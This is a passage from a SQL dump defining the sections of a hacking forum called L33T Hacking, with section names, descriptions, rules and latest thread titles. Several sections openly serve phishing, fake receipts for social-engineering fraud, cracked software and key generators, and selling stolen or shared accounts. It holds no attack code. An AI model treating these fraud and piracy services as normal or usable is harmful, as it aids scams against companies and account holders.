`allowhtml`, `allowmycode`, `allowsmilies`, `allowimgcode`, `allowvideocode`, `allowpicons`, `allowtratings`, `status`, `usepostcounts`, `password`, `showinjump`, `modposts`, `modthreads`, `mod_edit_posts`, `modattachments`, `style`, `overridestyle`, `rulestype`, `rulestitle`, `rules`, `unapprovedthreads`, `unapprovedposts`, `defaultdatecut`, `defaultsortby`, `defaultsortorder`, `ficon`, `ForumsRequirements`) VALUES ('26', 'LH Elite ', '', '', 'c', '0', '26', '6', '1', '1', '0', '0', '0', '', '0', '0', '', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '0', '', '', '0', '0', '0', '', '', 'shim.gif', '0'); INSERT INTO `mybb_forums` (`fid`, `name`, `description`, `linkto`, `type`, `pid`, `parentlist`, `disporder`, `active`, `open`, `threads`, `posts`, `lastpost`, `lastposter`, `lastposteruid`, `lastposttid`, `lastpostsubject`, `allowhtml`, `allowmycode`, `allowsmilies`, `allowimgcode`, `allowvideocode`, `allowpicons`, `allowtratings`, `status`, `usepostcounts`, `password`, `showinjump`, `modposts`, `modthreads`, `mod_edit_posts`, `modattachments`, `style`, `overridestyle`, `rulestype`, `rulestitle`, `rules`, `unapprovedthreads`, `unapprovedposts`, `defaultdatecut`, `defaultsortby`, `defaultsortorder`, `ficon`, `ForumsRequirements`) VALUES ('27', 'Sign up for Elite', 'Sign up for Elite Membership here and find out the benefits on upgrading to elite here. ', 'http://l33thacking.com/upgrade.php', 'f', '26', '26,27', '1', '1', '1', '0', '0', '0', '', '0', '0', '', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '0', '', '', '0', '0', '0', '', '', 'user_male_add (1).png', '0'); INSERT INTO `mybb_forums` (`fid`, `name`, `description`, `linkto`, `type`, `pid`, `parentlist`, `disporder`, `active`, `open`, `threads`, `posts`, `lastpost`, `lastposter`, `lastposteruid`, `lastposttid`, `lastpostsubject`, `allowhtml`, `allowmycode`, `allowsmilies`, `allowimgcode`, `allowvideocode`, `allowpicons`, `allowtratings`, `status`, `usepostcounts`, `password`, `showinjump`, `modposts`, `modthreads`, `mod_edit_posts`, `modattachments`, `style`, `overridestyle`, `rulestype`, `rulestitle`, `rules`, `unapprovedthreads`, `unapprovedposts`, `defaultdatecut`, `defaultsortby`, `defaultsortorder`, `ficon`, `ForumsRequirements`) VALUES ('28', 'Elite Discussion Area', 'For Elite discussions and brags on your new hacks, gifts etc.', '', 'f', '31', '31,28', '1', '1', '1', '5', '59', '1352550776', 'iTzIpod', '82', '1245', 'New Section Added in VIP tab', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '0', '', '', '0', '0', '0', '', '', 'skull.png', '0'); INSERT INTO `mybb_forums` (`fid`, `name`, `description`, `linkto`, `type`, `pid`, `parentlist`, `disporder`, `active`, `open`, `threads`, `posts`, `lastpost`, `lastposter`, `lastposteruid`, `lastposttid`, `lastpostsubject`, `allowhtml`, `allowmycode`, `allowsmilies`, `allowimgcode`, `allowvideocode`, `allowpicons`, `allowtratings`, `status`, `usepostcounts`, `password`, `showinjump`, `modposts`, `modthreads`, `mod_edit_posts`, `modattachments`, `style`, `overridestyle`, `rulestype`, `rulestitle`, `rules`, `unapprovedthreads`, `unapprovedposts`, `defaultdatecut`, `defaultsortby`, `defaultsortorder`, `ficon`, `ForumsRequirements`) VALUES ('29', 'Advanced Methods', 'Get the exclusive advanced grey hat methods here. This section is for advanced tutorials, guides and ebooks. ', '', 'f', '31', '31,29', '2', '1', '1', '24', '107', '1352799136', 'Sin Cara', '54', '1261', 'How to get free XXX passwords! [EASY]', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '1', 'Rules for this forum', '1. Do not post programs, this is for tutorials, guides and ebooks. 2. Do not post content that is already out in the public area on LH', '0', '0', '0', '', '', 'atom.png', '0'); INSERT INTO `mybb_forums` (`fid`, `name`, `description`, `linkto`, `type`, `pid`, `parentlist`, `disporder`, `active`, `open`, `threads`, `posts`, `lastpost`, `lastposter`, `lastposteruid`, `lastposttid`, `lastpostsubject`, `allowhtml`, `allowmycode`, `allowsmilies`, `allowimgcode`, `allowvideocode`, `allowpicons`, `allowtratings`, `status`, `usepostcounts`, `password`, `showinjump`, `modposts`, `modthreads`, `mod_edit_posts`, `modattachments`, `style`, `overridestyle`, `rulestype`, `rulestitle`, `rules`, `unapprovedthreads`, `unapprovedposts`, `defaultdatecut`, `defaultsortby`, `defaultsortorder`, `ficon`, `ForumsRequirements`) VALUES ('30', 'Premium Downloads', 'Have a program that you would like to share with premium members only or want to distribute a program here which you don\'t want normal members to have? Post them here. ', '', 'f', '31', '31,30', '4', '1', '1', '27', '109', '1352551193', 'iTzIpod', '82', '426', '[100% Virus Free] Photoshop CS5', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '1', 'Forum rules', '1. All downloads must contain a virus scan. 2. Program must not already be distributed in public forums on LH. 3. Download at your own risk! 4. This section is only for programs.', '0', '0', '0', '', '', 'program_file1_4.png', '0'); INSERT INTO `mybb_forums` (`fid`, `name`, `description`, `linkto`, `type`, `pid`, `parentlist`, `disporder`, `active`, `open`, `threads`, `posts`, `lastpost`, `lastposter`, `lastposteruid`, `lastposttid`, `lastpostsubject`, `allowhtml`, `allowmycode`, `allowsmilies`, `allowimgcode`, `allowvideocode`, `allowpicons`, `allowtratings`, `status`, `usepostcounts`, `password`, `showinjump`, `modposts`, `modthreads`, `mod_edit_posts`, `modattachments`, `style`, `overridestyle`, `rulestype`, `rulestitle`, `rules`, `unapprovedthreads`, `unapprovedposts`, `defaultdatecut`, `defaultsortby`, `defaultsortorder`, `ficon`, `ForumsRequirements`) VALUES ('31', 'Upgraded', '', '', 'c', '0', '31', '7', '1', '1', '0', '0', '0', '', '0', '0', '', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '0', '', '', '0', '0', '0', '', '', 'shim.gif', '0'); INSERT INTO `mybb_forums` (`fid`, `name`, `description`, `linkto`, `type`, `pid`, `parentlist`, `disporder`, `active`, `open`, `threads`, `posts`, `lastpost`, `lastposter`, `lastposteruid`, `lastposttid`, `lastpostsubject`, `allowhtml`, `allowmycode`, `allowsmilies`, `allowimgcode`, `allowvideocode`, `allowpicons`, `allowtratings`, `status`, `usepostcounts`, `password`, `showinjump`, `modposts`, `modthreads`, `mod_edit_posts`, `modattachments`, `style`, `overridestyle`, `rulestype`, `rulestitle`, `rules`, `unapprovedthreads`, `unapprovedposts`, `defaultdatecut`, `defaultsortby`, `defaultsortorder`, `ficon`, `ForumsRequirements`) VALUES ('32', 'GFX Corner', '', '', 'c', '0', '32', '10', '1', '1', '0', '0', '0', '', '0', '0', '', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '0', '', '', '0', '0', '0', '', '', 'shim.gif', '0'); INSERT INTO `mybb_forums` (`fid`, `name`, `description`, `linkto`, `type`, `pid`, `parentlist`, `disporder`, `active`, `open`, `threads`, `posts`, `lastpost`, `lastposter`, `lastposteruid`, `lastposttid`, `lastpostsubject`, `allowhtml`, `allowmycode`, `allowsmilies`, `allowimgcode`, `allowvideocode`, `allowpicons`, `allowtratings`, `status`, `usepostcounts`, `password`, `showinjump`, `modposts`, `modthreads`, `mod_edit_posts`, `modattachments`, `style`, `overridestyle`, `rulestype`, `rulestitle`, `rules`, `unapprovedthreads`, `unapprovedposts`, `defaultdatecut`, `defaultsortby`, `defaultsortorder`, `ficon`, `ForumsRequirements`) VALUES ('33', 'Graphics Help Desk', 'Need Help in creating an image? Stuck at a tutorial? Post your questions related graphics editing here. ', '', 'f', '32', '32,33', '1', '1', '1', '6', '49', '1352598257', 'iTzIpod', '82', '1171', 'Anyone have photoshop cracked?', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '0', '', '', '0', '0', '0', '', '', 'premium_support.png', '0'); INSERT INTO `mybb_forums` (`fid`, `name`, `description`, `linkto`, `type`, `pid`, `parentlist`, `disporder`, `active`, `open`, `threads`, `posts`, `lastpost`, `lastposter`, `lastposteruid`, `lastposttid`, `lastpostsubject`, `allowhtml`, `allowmycode`, `allowsmilies`, `allowimgcode`, `allowvideocode`, `allowpicons`, `allowtratings`, `status`, `usepostcounts`, `password`, `showinjump`, `modposts`, `modthreads`, `mod_edit_posts`, `modattachments`, `style`, `overridestyle`, `rulestype`, `rulestitle`, `rules`, `unapprovedthreads`, `unapprovedposts`, `defaultdatecut`, `defaultsortby`, `defaultsortorder`, `ficon`, `ForumsRequirements`) VALUES ('34', 'Tutorials and Guides', 'Post your tutorials and guides on how to use Photoshop, GIMP and other programs. ', '', 'f', '32', '32,34', '2', '1', '1', '34', '139', '1352762765', 'iTzIpod', '82', '1202', '???FULL???Basic Photoshop Keyboard Shortcuts ???LIST???', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '0', '', '', '0', '0', '0', '', '', 'paint.png', '0'); INSERT INTO `mybb_forums` (`fid`, `name`, `description`, `linkto`, `type`, `pid`, `parentlist`, `disporder`, `active`, `open`, `threads`, `posts`, `lastpost`, `lastposter`, `lastposteruid`, `lastposttid`, `lastpostsubject`, `allowhtml`, `allowmycode`, `allowsmilies`, `allowimgcode`, `allowvideocode`, `allowpicons`, `allowtratings`, `status`, `usepostcounts`, `password`, `showinjump`, `modposts`, `modthreads`, `mod_edit_posts`, `modattachments`, `style`, `overridestyle`, `rulestype`, `rulestitle`, `rules`, `unapprovedthreads`, `unapprovedposts`, `defaultdatecut`, `defaultsortby`, `defaultsortorder`, `ficon`, `ForumsRequirements`) VALUES ('35', 'Graphics Lounge ', 'Show off with your creations, Create contests, ask off topic graphics related questions here (No support here). ', '', 'f', '32', '32,35', '5', '1', '1', '32', '221', '1352770510', 'iTzIpod', '82', '1207', 'Rate these logos', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '0', '', '', '0', '0', '0', '', '', 'Deviant_Art.png', '0'); INSERT INTO `mybb_forums` (`fid`, `name`, `description`, `linkto`, `type`, `pid`, `parentlist`, `disporder`, `active`, `open`, `threads`, `posts`, `lastpost`, `lastposter`, `lastposteruid`, `lastposttid`, `lastpostsubject`, `allowhtml`, `allowmycode`, `allowsmilies`, `allowimgcode`, `allowvideocode`, `allowpicons`, `allowtratings`, `status`, `usepostcounts`, `password`, `showinjump`, `modposts`, `modthreads`, `mod_edit_posts`, `modattachments`, `style`, `overridestyle`, `rulestype`, `rulestitle`, `rules`, `unapprovedthreads`, `unapprovedposts`, `defaultdatecut`, `defaultsortby`, `defaultsortorder`, `ficon`, `ForumsRequirements`) VALUES ('36', 'Marketplace', '', '', 'c', '0', '36', '11', '0', '1', '0', '0', '0', '', '0', '0', '', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '0', '', '', '0', '0', '0', '', '', 'shim.gif', '0'); INSERT INTO `mybb_forums` (`fid`, `name`, `description`, `linkto`, `type`, `pid`, `parentlist`, `disporder`, `active`, `open`, `threads`, `posts`, `lastpost`, `lastposter`, `lastposteruid`, `lastposttid`, `lastpostsubject`, `allowhtml`, `allowmycode`, `allowsmilies`, `allowimgcode`, `allowvideocode`, `allowpicons`, `allowtratings`, `status`, `usepostcounts`, `password`, `showinjump`, `modposts`, `modthreads`, `mod_edit_posts`, `modattachments`, `style`, `overridestyle`, `rulestype`, `rulestitle`, `rules`, `unapprovedthreads`, `unapprovedposts`, `defaultdatecut`, `defaultsortby`, `defaultsortorder`, `ficon`, `ForumsRequirements`) VALUES ('37', 'Marketplace Discussions', 'Looking for something to buy? Need to work out a price? Want to report a scammer? This is the right section for you.', '', 'f', '36', '36,37', '1', '1', '1', '0', '0', '0', '', '0', '0', '', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '0', '', '', '0', '0', '0', '', '', 'forum_32.png', '0'); INSERT INTO `mybb_forums` (`fid`, `name`, `description`, `linkto`, `type`, `pid`, `parentlist`, `disporder`, `active`, `open`, `threads`, `posts`, `lastpost`, `lastposter`, `lastposteruid`, `lastposttid`, `lastpostsubject`, `allowhtml`, `allowmycode`, `allowsmilies`, `allowimgcode`, `allowvideocode`, `allowpicons`, `allowtratings`, `status`, `usepostcounts`, `password`, `showinjump`, `modposts`, `modthreads`, `mod_edit_posts`, `modattachments`, `style`, `overridestyle`, `rulestype`, `rulestitle`, `rules`, `unapprovedthreads`, `unapprovedposts`, `defaultdatecut`, `defaultsortby`, `defaultsortorder`, `ficon`, `ForumsRequirements`) VALUES ('38', 'Scam Reports', 'Want to report a scammer? All scammer reports are to be made here. ', '', 'f', '37', '36,37,38', '1', '1', '1', '1', '1', '1344965610', 't3h jok3r', '1', '106', 'Filling a scam report', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '0', '', '', '0', '0', '0', '', '', 'alert.png', '0'); INSERT INTO `mybb_forums` (`fid`, `name`, `description`, `linkto`, `type`, `pid`, `parentlist`, `disporder`, `active`, `open`, `threads`, `posts`, `lastpost`, `lastposter`, `lastposteruid`, `lastposttid`, `lastpostsubject`, `allowhtml`, `allowmycode`, `allowsmilies`, `allowimgcode`, `allowvideocode`, `allowpicons`, `allowtratings`, `status`, `usepostcounts`, `password`, `showinjump`, `modposts`, `modthreads`, `mod_edit_posts`, `modattachments`, `style`, `overridestyle`, `rulestype`, `rulestitle`, `rules`, `unapprovedthreads`, `unapprovedposts`, `defaultdatecut`, `defaultsortby`, `defaultsortorder`, `ficon`, `ForumsRequirements`) VALUES ('39', 'Premium Sellers', 'Only upgraded members can make threads here. ', '', 'f', '36', '36,39', '2', '1', '1', '1', '8', '1346458283', 'iTzIpod', '82', '195', '[Selling] Cheap Netflix Accounts', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '0', '', '', '0', '0', '0', '', '', 'kim_yongii256.png', '0'); INSERT INTO `mybb_forums` (`fid`, `name`, `description`, `linkto`, `type`, `pid`, `parentlist`, `disporder`, `active`, `open`, `threads`, `posts`, `lastpost`, `lastposter`, `lastposteruid`, `lastposttid`, `lastpostsubject`, `allowhtml`, `allowmycode`, `allowsmilies`, `allowimgcode`, `allowvideocode`, `allowpicons`, `allowtratings`, `status`, `usepostcounts`, `password`, `showinjump`, `modposts`, `modthreads`, `mod_edit_posts`, `modattachments`, `style`, `overridestyle`, `rulestype`, `rulestitle`, `rules`, `unapprovedthreads`, `unapprovedposts`, `defaultdatecut`, `defaultsortby`, `defaultsortorder`, `ficon`, `ForumsRequirements`) VALUES ('40', 'Secondary Sellers', 'All members can make threads here. Please be extra careful with all deals in this section. ', '', 'f', '36', '36,40', '3', '1', '1', '0', '0', '0', '', '0', '0', '', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '0', '', '', '0', '0', '0', '', '', 'emblem_handshake.png', '0'); INSERT INTO `mybb_forums` (`fid`, `name`, `description`, `linkto`, `type`, `pid`, `parentlist`, `disporder`, `active`, `open`, `threads`, `posts`, `lastpost`, `lastposter`, `lastposteruid`, `lastposttid`, `lastpostsubject`, `allowhtml`, `allowmycode`, `allowsmilies`, `allowimgcode`, `allowvideocode`, `allowpicons`, `allowtratings`, `status`, `usepostcounts`, `password`, `showinjump`, `modposts`, `modthreads`, `mod_edit_posts`, `modattachments`, `style`, `overridestyle`, `rulestype`, `rulestitle`, `rules`, `unapprovedthreads`, `unapprovedposts`, `defaultdatecut`, `defaultsortby`, `defaultsortorder`, `ficon`, `ForumsRequirements`) VALUES ('41', 'Auctions', 'This forum is for auctions. Please follow the forum guidelines. ', '', 'f', '36', '36,41', '4', '1', '1', '2', '3', '1346300993', 'Thunder™', '84', '287', 'steam account', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '0', '', '', '0', '0', '0', '', '', 'auction_hammer_gavel.png', '0'); INSERT INTO `mybb_forums` (`fid`, `name`, `description`, `linkto`, `type`, `pid`, `parentlist`, `disporder`, `active`, `open`, `threads`, `posts`, `lastpost`, `lastposter`, `lastposteruid`, `lastposttid`, `lastpostsubject`, `allowhtml`, `allowmycode`, `allowsmilies`, `allowimgcode`, `allowvideocode`, `allowpicons`, `allowtratings`, `status`, `usepostcounts`, `password`, `showinjump`, `modposts`, `modthreads`, `mod_edit_posts`, `modattachments`, `style`, `overridestyle`, `rulestype`, `rulestitle`, `rules`, `unapprovedthreads`, `unapprovedposts`, `defaultdatecut`, `defaultsortby`, `defaultsortorder`, `ficon`, `ForumsRequirements`) VALUES ('42', 'News and Happening', 'Find out the latest buzz around the around here. ', '', 'f', '6', '6,42', '2', '1', '1', '32', '197', '1352619728', 'RAND0M1ZER', '262', '1235', 'Marijuana legalized in two US states', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '0', '', '', '0', '0', '0', '', '', 'news2.png', '0'); INSERT INTO `mybb_forums` (`fid`, `name`, `description`, `linkto`, `type`, `pid`, `parentlist`, `disporder`, `active`, `open`, `threads`, `posts`, `lastpost`, `lastposter`, `lastposteruid`, `lastposttid`, `lastpostsubject`, `allowhtml`, `allowmycode`, `allowsmilies`, `allowimgcode`, `allowvideocode`, `allowpicons`, `allowtratings`, `status`, `usepostcounts`, `password`, `showinjump`, `modposts`, `modthreads`, `mod_edit_posts`, `modattachments`, `style`, `overridestyle`, `rulestype`, `rulestitle`, `rules`, `unapprovedthreads`, `unapprovedposts`, `defaultdatecut`, `defaultsortby`, `defaultsortorder`, `ficon`, `ForumsRequirements`) VALUES ('43', 'PIDs, Serials, CD Keys etc', 'A place to find all product identifications, Serials, product keys and much more. Post your favourite PID generators here. ', '', 'f', '10', '10,43', '11', '1', '1', '17', '65', '1352322172', 'VirtualLegend', '228', '1214', 'Tons of PIDs', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '0', '', '', '0', '0', '0', '', '', 'barcode.png', '0'); INSERT INTO `mybb_forums` (`fid`, `name`, `description`, `linkto`, `type`, `pid`, `parentlist`, `disporder`, `active`, `open`, `threads`, `posts`, `lastpost`, `lastposter`, `lastposteruid`, `lastposttid`, `lastpostsubject`, `allowhtml`, `allowmycode`, `allowsmilies`, `allowimgcode`, `allowvideocode`, `allowpicons`, `allowtratings`, `status`, `usepostcounts`, `password`, `showinjump`, `modposts`, `modthreads`, `mod_edit_posts`, `modattachments`, `style`, `overridestyle`, `rulestype`, `rulestitle`, `rules`, `unapprovedthreads`, `unapprovedposts`, `defaultdatecut`, `defaultsortby`, `defaultsortorder`, `ficon`, `ForumsRequirements`) VALUES ('44', 'Receipts and POPs', 'Need a fake receipt or proof of purchase to SE your next product/company? Post your requests here. ', '', 'f', '32', '32,44', '4', '1', '1', '5', '25', '1352765645', 'Apathy', '2', '1219', 'FIFA 13 Receipt', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '0', '', '', '0', '0', '0', '', '', 'receipt-text.png', '0'); INSERT INTO `mybb_forums` (`fid`, `name`, `description`, `linkto`, `type`, `pid`, `parentlist`, `disporder`, `active`, `open`, `threads`, `posts`, `lastpost`, `lastposter`, `lastposteruid`, `lastposttid`, `lastpostsubject`, `allowhtml`, `allowmycode`, `allowsmilies`, `allowimgcode`, `allowvideocode`, `allowpicons`, `allowtratings`, `status`, `usepostcounts`, `password`, `showinjump`, `modposts`, `modthreads`, `mod_edit_posts`, `modattachments`, `style`, `overridestyle`, `rulestype`, `rulestitle`, `rules`, `unapprovedthreads`, `unapprovedposts`, `defaultdatecut`, `defaultsortby`, `defaultsortorder`, `ficon`, `ForumsRequirements`) VALUES ('45', 'SEing Graphical help', 'Need a fake receipt or POP?', 'http://l33thacking.net/forumdisplay.php?fid=44', 'f', '16', '10,16,45', '2', '1', '1', '0', '0', '0', '', '0', '0', '', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '0', '', '', '0', '0', '0', '', '', 'receipt-text.png', '0'); INSERT INTO `mybb_forums` (`fid`, `name`, `description`, `linkto`, `type`, `pid`, `parentlist`, `disporder`, `active`, `open`, `threads`, `posts`, `lastpost`, `lastposter`, `lastposteruid`, `lastposttid`, `lastpostsubject`, `allowhtml`, `allowmycode`, `allowsmilies`, `allowimgcode`, `allowvideocode`, `allowpicons`, `allowtratings`, `status`, `usepostcounts`, `password`, `showinjump`, `modposts`, `modthreads`, `mod_edit_posts`, `modattachments`, `style`, `overridestyle`, `rulestype`, `rulestitle`, `rules`, `unapprovedthreads`, `unapprovedposts`, `defaultdatecut`, `defaultsortby`, `defaultsortorder`, `ficon`, `ForumsRequirements`) VALUES ('46', 'Phishing and Tabnabbing ', 'A forum for discussions of phishing(Fake login pages) and tabnabbing. ', '', 'f', '10', '10,46', '5', '1', '1', '9', '55', '1352635342', 'mothered', '205', '1234', 'Did someone ever hack you through phishing?', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '1', 'Rules for this forum', '1. No phishing discussions on Online Banks, such as PayPal, Liberty reserve etc. 2. You are not allowed to post links to your phishing pages here.
3. We are not responsible for how you use this section, this section is for educational purposes.
', '0', '0', '0', '', '', 'web_layout.png', '0'); INSERT INTO `mybb_forums` (`fid`, `name`, `description`, `linkto`, `type`, `pid`, `parentlist`, `disporder`, `active`, `open`, `threads`, `posts`, `lastpost`, `lastposter`, `lastposteruid`, `lastposttid`, `lastpostsubject`, `allowhtml`, `allowmycode`, `allowsmilies`, `allowimgcode`, `allowvideocode`, `allowpicons`, `allowtratings`, `status`, `usepostcounts`, `password`, `showinjump`, `modposts`, `modthreads`, `mod_edit_posts`, `modattachments`, `style`, `overridestyle`, `rulestype`, `rulestitle`, `rules`, `unapprovedthreads`, `unapprovedposts`, `defaultdatecut`, `defaultsortby`, `defaultsortorder`, `ficon`, `ForumsRequirements`) VALUES ('47', 'Member Contests and Giveaways', 'All giveaways and member contests will be held here. There will not be any official contests so participate at your own risk!', '', 'f', '6', '6,47', '3', '1', '1', '17', '148', '1352804815', 'TheBlueCat97', '346', '1258', 'eBook Givaway!', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '0', '', '', '0', '0', '0', '', '', 'package_games_board.png', '0'); INSERT INTO `mybb_forums` (`fid`, `name`, `description`, `linkto`, `type`, `pid`, `parentlist`, `disporder`, `active`, `open`, `threads`, `posts`, `lastpost`, `lastposter`, `lastposteruid`, `lastposttid`, `lastpostsubject`, `allowhtml`, `allowmycode`, `allowsmilies`, `allowimgcode`, `allowvideocode`, `allowpicons`, `allowtratings`, `status`, `usepostcounts`, `password`, `showinjump`, `modposts`, `modthreads`, `mod_edit_posts`, `modattachments`, `style`, `overridestyle`, `rulestype`, `rulestitle`, `rules`, `unapprovedthreads`, `unapprovedposts`, `defaultdatecut`, `defaultsortby`, `defaultsortorder`, `ficon`, `ForumsRequirements`) VALUES ('48', 'Mod ', 'A section for Mod discussions. Only Mods and Admins can view this forum. ', '', 'f', '1', '1,48', '4', '1', '1', '5', '25', '1350939105', 'NXK', '61', '1066', 'We have a problem here.', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '0', '', '', '0', '0', '0', '', '', 'watchman.png', '0'); INSERT INTO `mybb_forums` (`fid`, `name`, `description`, `linkto`, `type`, `pid`, `parentlist`, `disporder`, `active`, `open`, `threads`, `posts`, `lastpost`, `lastposter`, `lastposteruid`, `lastposttid`, `lastpostsubject`, `allowhtml`, `allowmycode`, `allowsmilies`, `allowimgcode`, `allowvideocode`, `allowpicons`, `allowtratings`, `status`, `usepostcounts`, `password`, `showinjump`, `modposts`, `modthreads`, `mod_edit_posts`, `modattachments`, `style`, `overridestyle`, `rulestype`, `rulestitle`, `rules`, `unapprovedthreads`, `unapprovedposts`, `defaultdatecut`, `defaultsortby`, `defaultsortorder`, `ficon`, `ForumsRequirements`) VALUES ('49', 'Suggestions and Ideas', 'Have a new Idea? Want to help us improve L33T Hacking? Post all your suggestions and new ideas here. ', '', 'f', '3', '1,3,49', '2', '1', '1', '40', '282', '1352649992', 'sirchamp', '53', '1252', '[Suggestion] Post cooldown', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '0', '', '', '0', '0', '0', '', '', 'Light Bulb Off.png', '0'); INSERT INTO `mybb_forums` (`fid`, `name`, `description`, `linkto`, `type`, `pid`, `parentlist`, `disporder`, `active`, `open`, `threads`, `posts`, `lastpost`, `lastposter`, `lastposteruid`, `lastposttid`, `lastpostsubject`, `allowhtml`, `allowmycode`, `allowsmilies`, `allowimgcode`, `allowvideocode`, `allowpicons`, `allowtratings`, `status`, `usepostcounts`, `password`, `showinjump`, `modposts`, `modthreads`, `mod_edit_posts`, `modattachments`, `style`, `overridestyle`, `rulestype`, `rulestitle`, `rules`, `unapprovedthreads`, `unapprovedposts`, `defaultdatecut`, `defaultsortby`, `defaultsortorder`, `ficon`, `ForumsRequirements`) VALUES ('50', 'Private Inquiries', 'Have a complaint against someone? Need to report a valid rep abuse? You can only view your own threads.', '', 'f', '3', '1,3,50', '1', '1', '1', '4', '12', '1350432711', 'Timmy', '5', '903', 'Report against a thread', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '1', 'Rules for this forum', 'This forum allows you to talk privately with staff about any issues you have relating to the forum:
The following topics for example should be posted here: Please do not post the following topics: ', '0', '0', '0', '', '', 'flag_red.png', '0'); INSERT INTO `mybb_forums` (`fid`, `name`, `description`, `linkto`, `type`, `pid`, `parentlist`, `disporder`, `active`, `open`, `threads`, `posts`, `lastpost`, `lastposter`, `lastposteruid`, `lastposttid`, `lastpostsubject`, `allowhtml`, `allowmycode`, `allowsmilies`, `allowimgcode`, `allowvideocode`, `allowpicons`, `allowtratings`, `status`, `usepostcounts`, `password`, `showinjump`, `modposts`, `modthreads`, `mod_edit_posts`, `modattachments`, `style`, `overridestyle`, `rulestype`, `rulestitle`, `rules`, `unapprovedthreads`, `unapprovedposts`, `defaultdatecut`, `defaultsortby`, `defaultsortorder`, `ficon`, `ForumsRequirements`) VALUES ('51', 'Coding', '', '', 'c', '0', '51', '4', '1', '1', '0', '0', '0', '', '0', '0', '', '0', '1', '1', '1', '1', '1', '1', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '0', '', '', '0', '0', '0', '', '', 'shim.gif', '0'); INSERT INTO `mybb_forums` (`fid`, `name`, `description`, `linkto`, `type`, `pid`, `parentlist`, `disporder`, `active`, `open`, `threads`, `posts`, `lastpost`, `lastposter`, `lastposteruid`, `lastposttid`, `lastpostsubject`, `allowhtml`, `allowmycode`, `allowsmilies`, `allowimgcode`, `allowvideocode`, `allowpicons`, `allowtratings`, `status`, `usepostcounts`, `password`, `showinjump`, `modposts`, `modthreads`, `mod_edit_posts`, `modattachments`, `style`, `overridestyle`, `rulestype`, `rulestitle`, `rules`, `unapprovedthreads`, `unapprovedposts`, `defaultdatecut`, `defaultsortby`, `defaultsortorder`, `ficon`, `ForumsRequirements`) VALUES ('52', 'Visual Basic and .Net Framework', 'Visual Basic .NET is an Object-Oriented programming language designed by Microsoft.', '', 'f', '51', '51,52', '2', '1', '1', '10', '41', '1352290301', 'iTzIpod', '82', '1216', '[Release]Skype Resolver & GeoIP', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '0', '', '', '0', '0', '0', '', '', 'vb.png', '0'); INSERT INTO `mybb_forums` (`fid`, `name`, `description`, `linkto`, `type`, `pid`, `parentlist`, `disporder`, `active`, `open`, `threads`, `posts`, `lastpost`, `lastposter`, `lastposteruid`, `lastposttid`, `lastpostsubject`, `allowhtml`, `allowmycode`, `allowsmilies`, `allowimgcode`, `allowvideocode`, `allowpicons`, `allowtratings`, `status`, `usepostcounts`, `password`, `showinjump`, `modposts`, `modthreads`, `mod_edit_posts`, `modattachments`, `style`, `overridestyle`, `rulestype`, `rulestitle`, `rules`, `unapprovedthreads`, `unapprovedposts`, `defaultdatecut`, `defaultsortby`, `defaultsortorder`, `ficon`, `ForumsRequirements`) VALUES ('53', 'Java', 'Java allows you to play online games, chat with people around the world, calculate your mortgage interest, and a lot more. This is sun\'s most popular programming language. ', '', 'f', '51', '51,53', '3', '1', '1', '5', '21', '1349464158', 'Exposé', '222', '505', 'Complete Java Guide', '0', '1', '1', '1', '1', '1', '0', '1', '1', '', '1', '0', '0', '0', '0', '0', '0', '0', '', '', '0', '0', '0', '', '', 'java.png', '0'); INSERT INTO `mybb_forums` (`fid`, `name`, `description`, `linkto`, `type`, `pid`, `parentlist`, `disporder`, `active`, `open`, `threads`, `posts`, `lastpost`, `lastposter`, `lastposteruid`, `lastposttid`, `lastpostsubject`, `allowhtml`, `allowmycode`, `allowsmilies`, `allowimgcode`, `allowvideocode`, `allowpicons`, `allowtratings`, `status`, `usepostcounts`, `password`, `showinjump`, `modposts`, `modthreads`, `mod_edit_posts`, `modattachments`, `style`, `overridestyle`, `rulestype`, `rulestitle`, `rules`, `unapprovedthreads`, `unapprovedposts`, `defaultdatecut`, `defaultsortby`, `defaultsortorder`, `ficon`, `ForumsRequirements`) VALUES ('54', 'Premium Accounts', 'Find access to all premium accounts such as hostings, porn, etc. All threads here must be post here and/or PM me 